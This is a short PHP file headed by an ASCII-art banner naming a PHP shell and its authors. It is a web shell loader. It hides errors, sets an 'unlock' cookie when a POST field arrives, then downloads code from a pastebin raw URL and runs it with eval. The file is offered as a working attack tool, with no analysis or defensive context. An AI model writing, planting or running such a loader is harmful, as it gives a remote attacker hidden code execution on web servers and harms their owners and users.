<?php /*

_______ _     _        _______  ______ _     _ _______       _____  _     _  _____       _______ _     _ _______
|______ |     | |      |       |_____/ |     | |  |  |      |_____] |_____| |_____]      |______ |_____| |______ |      |
|       |_____| |_____ |_____  |    \_ |_____| |  |  |      |       |     | |            ______| |     | |______ |_____ |_____

                                                    By Anthrax and Drigg3r
                                                          Osmium Group

*/ @ini_set('output_buffering',0); @ini_set('display_errors', 0);
 if ( isset( $_POST[ 'unlock' ] ) ) { setcookie('unlock', 'unlocked', time() + (600), "/"); } 
if( isset( $_COOKIE['unlock']) ) {  $encdyc = file_get_contents("http://pastebin.com/raw/e0NuSwEW"); eval("?>".($encdyc)); } ?>
